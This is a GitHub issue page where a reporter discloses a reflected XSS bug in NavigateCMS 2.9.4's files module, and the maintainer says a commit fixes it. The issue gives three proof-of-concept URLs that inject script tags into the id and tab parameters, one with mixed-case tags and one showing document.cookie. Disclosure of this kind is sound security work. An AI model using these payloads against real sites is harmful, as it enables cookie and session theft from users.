search

NavigateCMS / Navigate-CMS

Navigate CMS, a very powerful open source content management system for everybody.
http://www.navigatecms.com
GNU General Public License v2.0
8 stars 4 forks source link

[Security Bug] XSS in \lib\packages\files\files.php in NavigateCMS 2.9.4 r1561 #30

Closed faisalfs10x closed 2 years ago

faisalfs10x commented 2 years ago

Vulnerability Name: XSS

Product version: NavigateCMS 2.9.4 r1561

Vulnerability Description: XSS to capture the cookies of anyone that navigates to the vulnerable URL

Vulnerable URL: 1) http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3Cscript%3Ealert(%22xss-1%22)%3C/script%3E 2) http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E 3) http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3CsCriPt%3Ealert(%22XSS-1%22)%3C/sCriPt%3E&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E

image

Affected Source code: \lib\packages\files\files.php image

NavigateCMS commented 2 years ago

Fixed by f9af8cbf4831599c9092a22f9f931cf1db8c3876

Thank you very much.